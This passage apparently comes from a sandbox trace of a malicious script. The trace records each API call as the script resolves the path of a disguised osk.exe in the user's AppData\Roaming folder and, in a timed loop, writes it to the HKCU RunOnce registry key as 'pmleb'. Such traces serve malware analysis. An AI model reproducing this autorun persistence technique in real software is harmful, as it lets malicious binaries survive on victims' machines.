wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.140] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.141] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0081.141] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.141] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x24 [0081.141] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.142] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0081.142] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.142] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.142] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.142] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.142] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.142] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.142] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.142] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.142] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.142] RegCloseKey (hKey=0x280) returned 0x0 [0081.143] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.143] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.143] SetTimer (hWnd=0x20280, nIDEvent=0x209f, uElapse=0xa, lpTimerFunc=0x0) returned 0x209f [0081.143] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.157] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.157] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.157] KillTimer (hWnd=0x20280, uIDEvent=0x209f) returned 1 [0081.157] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.157] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.158] IUnknown:Release (This=0x787518) returned 0x1 [0081.158] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.158] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.158] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.158] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.158] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0081.158] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.158] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x25 [0081.158] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.159] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0081.159] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.159] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.159] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.159] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.159] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.160] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.160] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.160] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.160] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.160] RegCloseKey (hKey=0x280) returned 0x0 [0081.160] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.160] SetTimer (hWnd=0x20280, nIDEvent=0x20a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a0 [0081.160] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.172] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.172] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.172] KillTimer (hWnd=0x20280, uIDEvent=0x20a0) returned 1 [0081.173] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.173] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.173] IUnknown:Release (This=0x787518) returned 0x1 [0081.173] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.173] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.173] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.173] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.173] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0081.173] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.173] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x26 [0081.174] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.174] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0081.174] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.174] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.174] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.174] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.174] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.175] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.175] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.175] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.175] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.175] RegCloseKey (hKey=0x280) returned 0x0 [0081.175] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.175] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.175] SetTimer (hWnd=0x20280, nIDEvent=0x20a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a1 [0081.175] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.188] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.188] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.188] KillTimer (hWnd=0x20280, uIDEvent=0x20a1) returned 1 [0081.188] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.188] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
